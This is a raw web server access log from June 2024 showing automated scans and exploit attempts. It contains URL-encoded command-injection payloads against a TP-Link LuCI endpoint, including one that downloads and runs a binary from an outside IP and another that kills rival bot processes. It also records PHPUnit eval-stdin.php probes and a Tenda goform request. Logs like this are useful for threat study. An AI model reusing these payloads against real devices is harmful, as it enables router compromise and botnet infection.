/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 45.148.10.174 - - [23/Jun/2024:18:17:31 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 194.165.16.72 - - [23/Jun/2024:18:24:17 -0300] "-" 400 2020 106.75.65.201 - - [23/Jun/2024:18:36:46 -0300] "GET / HTTP/1.1" 200 11237 141.98.11.82 - - [23/Jun/2024:18:44:59 -0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 826 141.98.11.82 - - [23/Jun/2024:18:44:59 -0300] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 818 141.98.11.82 - - [23/Jun/2024:18:45:00 -0300] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 814 141.98.11.82 - - [23/Jun/2024:18:45:00 -0300] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 806 141.98.11.82 - - [23/Jun/2024:18:45:00 -0300] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 837 141.98.11.82 - - [23/Jun/2024:18:45:00 -0300] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 813 141.98.11.82 - - [23/Jun/2024:18:45:01 -0300] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 823 141.98.11.82 - - [23/Jun/2024:18:45:01 -0300] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 815 141.98.11.82 - - [23/Jun/2024:18:45:01 -0300] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 811 141.98.11.82 - - [23/Jun/2024:18:45:01 -0300] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 803 141.98.11.82 - - [23/Jun/2024:18:45:02 -0300] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:02 -0300] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 815 141.98.11.82 - - [23/Jun/2024:18:45:02 -0300] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 807 141.98.11.82 - - [23/Jun/2024:18:45:03 -0300] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 803 141.98.11.82 - - [23/Jun/2024:18:45:03 -0300] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 795 141.98.11.82 - - [23/Jun/2024:18:45:03 -0300] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:04 -0300] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 838 141.98.11.82 - - [23/Jun/2024:18:45:04 -0300] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 836 141.98.11.82 - - [23/Jun/2024:18:45:05 -0300] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:05 -0300] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:05 -0300] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 836 141.98.11.82 - - [23/Jun/2024:18:45:06 -0300] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 840 141.98.11.82 - - [23/Jun/2024:18:45:06 -0300] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:07 -0300] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 833 141.98.11.82 - - [23/Jun/2024:18:45:07 -0300] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:07 -0300] "GET /all/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:08 -0300] "GET /advanced/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 839 141.98.11.82 - - [23/Jun/2024:18:45:08 -0300] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:09 -0300] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:09 -0300] "GET /back/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:09 -0300] "GET /backend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 838 141.98.11.82 - - [23/Jun/2024:18:45:10 -0300] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 837 141.98.11.82 - - [23/Jun/2024:18:45:10 -0300] "GET /beta/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:11 -0300] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:11 -0300] "GET /blog/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 843 141.98.11.82 - - [23/Jun/2024:18:45:11 -0300] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:12 -0300] "GET /config/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 837 141.98.11.82 - - [23/Jun/2024:18:45:12 -0300] "GET /core/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:13 -0300] "GET /core/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 843 141.98.11.82 - - [23/Jun/2024:18:45:13 -0300] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:13 -0300] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:14 -0300] "GET /dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:14 -0300] "GET /develop/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 838 141.98.11.82 - - [23/Jun/2024:18:45:14 -0300] "GET /ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 833 141.98.11.82 - - [23/Jun/2024:18:45:15 -0300] "GET /ecc/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:15 -0300] "GET /git/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:15 -0300] "GET /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:15 -0300] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 838 141.98.11.82 - - [23/Jun/2024:18:45:16 -0300] "GET /laravel_api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 842 141.98.11.82 - - [23/Jun/2024:18:45:16 -0300] "GET /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 842 141.98.11.82 - - [23/Jun/2024:18:45:16 -0300] "GET /live/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:17 -0300] "GET /local/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 836 141.98.11.82 - - [23/Jun/2024:18:45:17 -0300] "GET /modules/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 838 141.98.11.82 - - [23/Jun/2024:18:45:17 -0300] "GET /new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:18 -0300] "GET /old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:18 -0300] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 836 141.98.11.82 - - [23/Jun/2024:18:45:18 -0300] "GET /pid/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:19 -0300] "GET /pkm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:19 -0300] "GET /pms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:19 -0300] "GET /portal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 837 141.98.11.82 - - [23/Jun/2024:18:45:20 -0300] "GET /pos/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 823 141.98.11.82 - - [23/Jun/2024:18:45:20 -0300] "GET /pos/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 141.98.11.82 - - [23/Jun/2024:18:45:20 -0300] "GET /production/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 849 141.98.11.82 - - [23/Jun/2024:18:45:21 -0300] "GET /production/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 841 141.98.11.82 - - [23/Jun/2024:18:45:21 -0300] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 837 141.98.11.82 - - [23/Jun/2024:18:45:21 -0300] "GET /server/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 837 141.98.11.82 - - [23/Jun/2024:18:45:22 -0300] "GET /site/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 835 141.98.11.82 - - [23/Jun/2024:18:45:22 -0300] "GET /workspace/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 840 141.98.11.82 - - [23/Jun/2024:18:45:22 -0300] "GET /web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 834 78.108.177.54 - - [23/Jun/2024:18:50:12 -0300] "GET / HTTP/1.0" 200 11217 149.50.103.48 - - [23/Jun/2024:19:21:48 -0300] "GET / HTTP/1.1" 200 11237 87.121.69.27 - - [23/Jun/2024:19:35:56 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 141.98.11.15 - - [23/Jun/2024:19:42:39 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 141.98.83.197 - - [23/Jun/2024:19:44:16 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 141.98.83.197 - - [23/Jun/2024:19:44:16 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 104.40.75.178 - - [23/Jun/2024:20:21:00 -0300] "GET /actuator/health HTTP/1.1" 404 771 149.50.103.48 - - [23/Jun/2024:20:48:16 -0300] "GET / HTTP/1.1" 200 11237 185.107.28.194 - - [23/Jun/2024:20:49:06 -0300] "GET / HTTP/1.1" 200 11237 45.128.232.200 - - [23/Jun/2024:21:16:43 -0300] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 782 87.121.69.27 - - [23/Jun/2024:21:36:47 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 165.232.92.69 - - [23/Jun/2024:21:53:04 -0300] "-" 400 2874 165.232.92.69 - - [23/Jun/2024:21:53:04 -0300] "-" 400 2870 165.232.92.69 - - [23/Jun/2024:21:53:05 -0300] "GET / HTTP/1.1" 200 11237 165.232.92.69 - - [23/Jun/2024:21:53:05 -0300] "GET /download/powershell/ HTTP/1.1" 404 780 198.235.24.116 - - [23/Jun/2024:21:58:46 -0300] "GET / HTTP/1.0" 200 11217 65.49.1.27 - - [23/Jun/2024:22:04:52 -0300] "-" 400 2048 45.128.232.200 - - [23/Jun/2024:22:22:49 -0300] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 782 149.50.103.48 - - [23/Jun/2024:22:23:12 -0300] "GET / HTTP/1.1" 200 11237 20.74.166.164 - - [23/Jun/2024:22:28:02 -0300] "HI 6e461340-3dc0-4d2a-a6d2-5d3f80b10679 " 400 796 45.128.232.200 - - [23/Jun/2024:22:44:42 -0300] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 782 198.235.24.39 - - [23/Jun/2024:22:45:39 -0300] "-" 400 2206 198.235.24.39 - - [23/Jun/2024:22:45:40 -0300] "-" 400 2078 87.121.69.27 - - [23/Jun/2024:23:07:15 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 149.50.103.48 - - [23/Jun/2024:23:17:04 -0300] "GET / HTTP/1.1" 200 11237